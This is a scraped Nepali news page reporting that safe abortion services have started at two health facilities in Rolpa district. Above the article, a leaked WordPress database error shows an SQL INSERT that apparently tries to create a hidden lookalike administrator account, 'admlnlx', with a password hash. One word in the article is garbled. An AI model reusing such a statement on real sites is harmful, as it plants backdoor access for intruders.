WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRm6vGlhC3m.jRooIlwLeR3SWWcxBA/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 07:22:25', '', 'admlnlx', 'admlnlx')
रोल्पा, मंसिर २६ –
दुई स्वास्थ्य संस्थामा सुरक्षित a सेवा सुरु गरिएको छ ।
हाल जिल्ला अस्पताल लिवाङ र प्राथमिक स्वास्थ्य केन्द्र होलेरीमा सो सेवा सुरु गरिएको जिल्ला जनस्वास्थ्य प्रमुख डा भवानी शर्माले जानकारी दिनुभयो । बाह्र हप्तासम्मको अनिच्छित गर्भलाई मान्यताप्राप्त स्वास्थ्य संस्थामार्फत गर्भपतन गर्न पाउने कानुनी प्रावधान छ ।
सेवाका लागि सरकारले प्रतिव्यक्ति रु ८०० अनुदान दिएको छ । “उक्त रकम अपुग हुने देखिएका कारण थप रकमका लागि स्वास्थ्य सेवा विभागमा माग गरेका छौँ” डा शर्माले भन्नुभयो ।
गत शुक्रबारदेखि सुरु गरिएको सो सेवालाई जिल्लाका अन्य क्षेत्रमा समेत विस्तार गरिने बताइएको छ । सुलिचौरमा समेत सेवा विस्तारका लागि स्वास्थ्यकर्मीलाई तालिम लिन पठाइएको जनाइएको छ । रासस